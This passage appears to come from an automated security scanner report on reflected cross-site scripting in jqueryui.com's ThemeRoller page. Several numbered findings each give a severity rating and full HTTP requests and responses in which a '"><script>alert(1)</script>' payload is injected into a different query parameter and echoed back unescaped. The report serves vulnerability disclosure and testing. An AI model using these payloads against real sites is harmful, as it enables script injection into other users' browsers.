0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:42:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9eae11"><script>alert(1)</script>ebc3646c0ab&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55
...[SNIP]...

4.141. http://jqueryui.com/themeroller/ [bgColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df530"><script>alert(1)</script>25601c79a2e was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfddf530"><script>alert(1)</script>25601c79a2e&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfddf530"><script>alert(1)</script>25601c79a2e&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85
...[SNIP]...

4.142. http://jqueryui.com/themeroller/ [bgColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10283"><script>alert(1)</script>d2b773a3e6 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc10283"><script>alert(1)</script>d2b773a3e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120173

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc10283"><script>alert(1)</script>d2b773a3e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

4.143. http://jqueryui.com/themeroller/ [bgColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33d2f"><script>alert(1)</script>fe81736995b was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc33d2f"><script>alert(1)</script>fe81736995b&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:39:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc33d2f"><script>alert(1)</script>fe81736995b&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100
...[SNIP]...

4.144. http://jqueryui.com/themeroller/ [bgColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4a2b"><script>alert(1)</script>aac3cc6fe96 was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5e4a2b"><script>alert(1)</script>aac3cc6fe96&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:41:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5e4a2b"><script>alert(1)</script>aac3cc6fe96&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorA
...[SNIP]...

4.145. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9449b"><script>alert(1)</script>86f3b7ecaa6 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=1009449b"><script>alert(1)</script>86f3b7ecaa6&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=1009449b"><script>alert(1)</script>86f3b7ecaa6&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefaul
...[SNIP]...

4.146. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea547"><script>alert(1)</script>44c9f70b60c was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85ea547"><script>alert(1)</script>44c9f70b60c&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:41:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85ea547"><script>alert(1)</script>44c9f70b60c&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgC
...[SNIP]...

4.147. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9719"><script>alert(1)</script>dd196012e00 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55d9719"><script>alert(1)</script>dd196012e00&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55d9719"><script>alert(1)</script>dd196012e00&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorCon
...[SNIP]...

4.148. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d312"><script>alert(1)</script>7ccc9c6c514 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=754d312"><script>alert(1)</script>7ccc9c6c514&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:42:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=754d312"><script>alert(1)</script>7ccc9c6c514&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd
...[SNIP]...

4.149. http://jqueryui.com/themeroller/ [bgTextureActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da742"><script>alert(1)</script>727d2ffc486 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.pngda742"><script>alert(1)</script>727d2ffc486&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=